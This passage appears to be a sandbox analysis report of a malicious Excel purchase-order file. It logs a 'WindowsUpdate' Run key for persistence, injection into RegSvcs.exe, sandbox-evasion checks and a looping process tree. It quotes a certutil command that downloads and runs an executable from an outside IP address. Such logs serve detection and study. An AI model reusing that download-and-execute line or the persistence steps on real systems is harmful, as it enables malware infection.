Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	xckjkc.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\xckjkc.pif C:\\Users\\Admin\\AppData\\Local\\Temp\\2_92\\MURCQF~1.SWK"	xckjkc.pif

Suspicious use of SetThreadContext 27 IoCs

Processes:

description	pid	process	target process
PID 3516 set thread context of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 3420 set thread context of 604	3420	xckjkc.pif	RegSvcs.exe
PID 4168 set thread context of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 3068 set thread context of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 2196 set thread context of 4268	2196	xckjkc.pif	RegSvcs.exe
PID 4252 set thread context of 1060	4252	xckjkc.pif	RegSvcs.exe
PID 532 set thread context of 3944	532	xckjkc.pif	RegSvcs.exe
PID 3616 set thread context of 3440	3616	xckjkc.pif	RegSvcs.exe
PID 4672 set thread context of 1008	4672	xckjkc.pif	RegSvcs.exe
PID 4272 set thread context of 2936	4272	xckjkc.pif	RegSvcs.exe
PID 4188 set thread context of 1604	4188	xckjkc.pif	RegSvcs.exe
PID 1508 set thread context of 4292	1508	xckjkc.pif	RegSvcs.exe
PID 1828 set thread context of 2896	1828	xckjkc.pif	RegSvcs.exe
PID 2176 set thread context of 2440	2176	xckjkc.pif	RegSvcs.exe
PID 3092 set thread context of 228	3092	xckjkc.pif	RegSvcs.exe
PID 908 set thread context of 4672	908	xckjkc.pif	RegSvcs.exe
PID 4496 set thread context of 4604	4496	xckjkc.pif	RegSvcs.exe
PID 3560 set thread context of 2960	3560	xckjkc.pif	RegSvcs.exe
PID 2248 set thread context of 4648	2248	xckjkc.pif	RegSvcs.exe
PID 2840 set thread context of 2052	2840	xckjkc.pif	RegSvcs.exe
PID 4296 set thread context of 1148	4296	xckjkc.pif	RegSvcs.exe
PID 1740 set thread context of 3580	1740	xckjkc.pif	RegSvcs.exe
PID 1820 set thread context of 2916	1820	xckjkc.pif	RegSvcs.exe
PID 4484 set thread context of 4312	4484	xckjkc.pif	RegSvcs.exe
PID 2748 set thread context of 2000	2748	xckjkc.pif	RegSvcs.exe
PID 1692 set thread context of 1084	1692	xckjkc.pif	RegSvcs.exe
PID 4120 set thread context of 1604	4120	xckjkc.pif	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies registry class 27 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	xckjkc.pif

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4856 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

xckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pifxckjkc.pif

pid	process
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3516	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
3420	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
4168	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
3068	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif
2196	xckjkc.pif

Suspicious use of SetWindowsHookEx 44 IoCs

Processes:

EXCEL.EXE

pid	process
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE
4856	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEWinUpdate.exexckjkc.pifRegSvcs.exeWScript.exexckjkc.pifRegSvcs.exeWScript.exexckjkc.pifRegSvcs.exeWScript.exexckjkc.pifRegSvcs.exeWScript.exe

description	pid	process	target process
PID 4856 wrote to memory of 4552	4856	EXCEL.EXE	certutil.exe
PID 4856 wrote to memory of 4552	4856	EXCEL.EXE	certutil.exe
PID 4856 wrote to memory of 3756	4856	EXCEL.EXE	WinUpdate.exe
PID 4856 wrote to memory of 3756	4856	EXCEL.EXE	WinUpdate.exe
PID 4856 wrote to memory of 3756	4856	EXCEL.EXE	WinUpdate.exe
PID 3756 wrote to memory of 3516	3756	WinUpdate.exe	xckjkc.pif
PID 3756 wrote to memory of 3516	3756	WinUpdate.exe	xckjkc.pif
PID 3756 wrote to memory of 3516	3756	WinUpdate.exe	xckjkc.pif
PID 3516 wrote to memory of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 3516 wrote to memory of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 3516 wrote to memory of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 3516 wrote to memory of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 3516 wrote to memory of 4604	3516	xckjkc.pif	RegSvcs.exe
PID 4604 wrote to memory of 2708	4604	RegSvcs.exe	Host.exe
PID 4604 wrote to memory of 2708	4604	RegSvcs.exe	Host.exe
PID 4604 wrote to memory of 2708	4604	RegSvcs.exe	Host.exe
PID 3516 wrote to memory of 3056	3516	xckjkc.pif	WScript.exe
PID 3516 wrote to memory of 3056	3516	xckjkc.pif	WScript.exe
PID 3516 wrote to memory of 3056	3516	xckjkc.pif	WScript.exe
PID 3056 wrote to memory of 3420	3056	WScript.exe	xckjkc.pif
PID 3056 wrote to memory of 3420	3056	WScript.exe	xckjkc.pif
PID 3056 wrote to memory of 3420	3056	WScript.exe	xckjkc.pif
PID 3420 wrote to memory of 604	3420	xckjkc.pif	RegSvcs.exe
PID 3420 wrote to memory of 604	3420	xckjkc.pif	RegSvcs.exe
PID 3420 wrote to memory of 604	3420	xckjkc.pif	RegSvcs.exe
PID 3420 wrote to memory of 604	3420	xckjkc.pif	RegSvcs.exe
PID 3420 wrote to memory of 604	3420	xckjkc.pif	RegSvcs.exe
PID 604 wrote to memory of 3952	604	RegSvcs.exe	Host.exe
PID 604 wrote to memory of 3952	604	RegSvcs.exe	Host.exe
PID 604 wrote to memory of 3952	604	RegSvcs.exe	Host.exe
PID 3420 wrote to memory of 4284	3420	xckjkc.pif	WScript.exe
PID 3420 wrote to memory of 4284	3420	xckjkc.pif	WScript.exe
PID 3420 wrote to memory of 4284	3420	xckjkc.pif	WScript.exe
PID 4284 wrote to memory of 4168	4284	WScript.exe	xckjkc.pif
PID 4284 wrote to memory of 4168	4284	WScript.exe	xckjkc.pif
PID 4284 wrote to memory of 4168	4284	WScript.exe	xckjkc.pif
PID 4168 wrote to memory of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 4168 wrote to memory of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 4168 wrote to memory of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 4168 wrote to memory of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 4168 wrote to memory of 1516	4168	xckjkc.pif	RegSvcs.exe
PID 1516 wrote to memory of 3540	1516	RegSvcs.exe	Host.exe
PID 1516 wrote to memory of 3540	1516	RegSvcs.exe	Host.exe
PID 1516 wrote to memory of 3540	1516	RegSvcs.exe	Host.exe
PID 4168 wrote to memory of 3136	4168	xckjkc.pif	WScript.exe
PID 4168 wrote to memory of 3136	4168	xckjkc.pif	WScript.exe
PID 4168 wrote to memory of 3136	4168	xckjkc.pif	WScript.exe
PID 3136 wrote to memory of 3068	3136	WScript.exe	xckjkc.pif
PID 3136 wrote to memory of 3068	3136	WScript.exe	xckjkc.pif
PID 3136 wrote to memory of 3068	3136	WScript.exe	xckjkc.pif
PID 3068 wrote to memory of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 3068 wrote to memory of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 3068 wrote to memory of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 3068 wrote to memory of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 3068 wrote to memory of 2392	3068	xckjkc.pif	RegSvcs.exe
PID 2392 wrote to memory of 3416	2392	RegSvcs.exe	Host.exe
PID 2392 wrote to memory of 3416	2392	RegSvcs.exe	Host.exe
PID 2392 wrote to memory of 3416	2392	RegSvcs.exe	Host.exe
PID 3068 wrote to memory of 1412	3068	xckjkc.pif	WScript.exe
PID 3068 wrote to memory of 1412	3068	xckjkc.pif	WScript.exe
PID 3068 wrote to memory of 1412	3068	xckjkc.pif	WScript.exe
PID 1412 wrote to memory of 2196	1412	WScript.exe	xckjkc.pif
PID 1412 wrote to memory of 2196	1412	WScript.exe	xckjkc.pif
PID 1412 wrote to memory of 2196	1412	WScript.exe	xckjkc.pif

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO 0767532.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -urlcache -split -f http://192.3.194.246/P_O999.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
2⤵
- Process spawned unexpected child process
PID:4552

C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" murcqfuubq.swk
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3516

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4604

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
5⤵
- Executes dropped EXE
PID:2708

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3056

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
5⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3420

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:604

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
7⤵
- Executes dropped EXE
PID:3952

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4284

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
7⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4168

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1516

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
9⤵
- Executes dropped EXE
PID:3540

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
8⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
9⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3068

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
10⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2392

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
11⤵
- Executes dropped EXE
PID:3416

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
10⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1412

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
11⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
12⤵
- Executes dropped EXE
- Checks computer location settings
PID:4268

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
13⤵
- Executes dropped EXE
PID:2368

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
12⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
13⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4252

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
14⤵
- Executes dropped EXE
- Checks computer location settings
PID:1060

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
15⤵
- Executes dropped EXE
PID:1664

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
14⤵
- Checks computer location settings
PID:464

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
15⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:532

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
16⤵
- Executes dropped EXE
PID:3944

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
17⤵
- Executes dropped EXE
PID:3852

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
16⤵
- Checks computer location settings
PID:3420

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
17⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3616

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
18⤵
- Executes dropped EXE
- Checks computer location settings
PID:3440

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
19⤵
- Executes dropped EXE
PID:1328

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
18⤵
- Checks computer location settings
PID:988

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
19⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4672

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
20⤵
- Executes dropped EXE
- Checks computer location settings
PID:1008

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
21⤵
- Executes dropped EXE
PID:700

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
20⤵
- Checks computer location settings
PID:3756

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
21⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4272

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
22⤵
- Executes dropped EXE
- Checks computer location settings
PID:2936

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
23⤵
- Executes dropped EXE
PID:4228

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
22⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
23⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4188

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
24⤵
- Executes dropped EXE
PID:1604

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
25⤵
- Executes dropped EXE
PID:3832

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
24⤵
- Checks computer location settings
PID:4388

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
25⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1508

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
26⤵
- Executes dropped EXE
- Checks computer location settings
PID:4292

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
27⤵
- Executes dropped EXE
PID:460

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
26⤵
- Checks computer location settings
PID:1360

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
27⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:1828

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
28⤵
- Executes dropped EXE
PID:2896

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
29⤵
- Executes dropped EXE
PID:3944

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
28⤵
- Checks computer location settings
PID:1448

C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif
"C:\Users\Admin\AppData\Local\Temp\2_92\xckjkc.pif" MURCQF~1.SWK
29⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2176

C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
30⤵
- Executes dropped EXE
- Checks computer location settings
PID:2440

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
31⤵
- Executes dropped EXE
PID:4736

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2_92\run.vbs"
30⤵
